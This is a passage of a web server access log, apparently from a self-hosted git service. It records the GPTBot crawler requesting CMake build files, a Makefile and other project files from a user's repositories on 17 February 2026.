"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:17:00:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14321] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:17:00:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14320] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:17:00:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:17:00:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:17:00:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:17:00:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26363] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:17:00:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26360] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:17:00:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 955] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" -[17/Feb/2026:17:00:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 1871] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" -[17/Feb/2026:17:00:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/TestApp" -[17/Feb/2026:17:00:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14602] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:17:00:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14599] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:17:00:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:17:00:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:17:00:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14600] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:17:00:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:17:00:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9984] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:17:00:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:17:00:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:17:00:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:17:00:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:17:00:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9992] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:17:00:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9992] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:17:00:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32932] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:17:00:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32931] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:17:00:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/TestApp" -[17/Feb/2026:17:00:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16204] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/Makefile" -[17/Feb/2026:17:00:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/TestApp" -[17/Feb/2026:17:00:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10301] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:17:00:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10304] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:17:00:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10291] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:17:00:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11117] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:17:00:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14656] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:17:00:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig?display=rendered" [Client 74.7.227.38] [Length 11036] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:17:00:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig?display=source" [Client 74.7.227.38] [Length 11580] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:17:00:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/watchdog_final_debug.spec" [Client 74.7.227.38] [Length 769] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_debug.spec" -[17/Feb/2026:17:00:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fTestApp.dir%2flink.d" [Client 74.7.227.38] [Length 28015] [Gzip 6.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:17:00:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2f3.31.10%2fCompilerIdC" [Client 74.7.227.38] [Length 54123] [Gzip 12.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:17:00:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2fmodbus_exception.hpp" [Client 74.7.227.38] [Length 18530] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:17:00:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:00:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:00:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:00:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10008] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:00:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10005] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:00:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10002] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:00:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11349] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:00:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr 